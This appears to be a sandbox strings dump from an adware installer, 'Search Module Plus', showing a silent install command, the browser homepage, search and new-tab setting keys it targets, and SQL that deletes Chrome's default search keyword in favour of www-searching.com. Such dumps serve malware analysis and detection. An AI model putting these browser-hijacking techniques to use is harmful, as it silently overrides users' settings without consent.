C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_6989\ins_smk.exe /S /db=all /is=1 /ih=1 /sparam=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

%Program Files%\Common Files\Goobzo\GBUpdatePlus

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_6989

ins_smk.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Install_6989\ins_smk.exe

Software\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus

/S /db=all /is=1 /ih=1 /sparam=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f, /urlset=searching /remote /setie /aff=amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f, /rnd=13880

amodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f,

F6Tjamodk0_0_0_0_0,99999999-9999-490d-ae0d-57b7b591d16f,

-1299436806

F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,

smei32.dll

smei64.dll

)-.Yln

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

2.1.9.476

smw.exe

ins_smk.exe_1136_rwx_10004000_00001000:

callback%d

ns5.tmp_1516:

.text

`.rdata

@.data

.reloc

SShL0

PeekNamedPipe

CreatePipe

KERNEL32.dll

USER32.dll

ADVAPI32.dll

nsExec.dll

:":2:7:@:

smu.exe_896:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

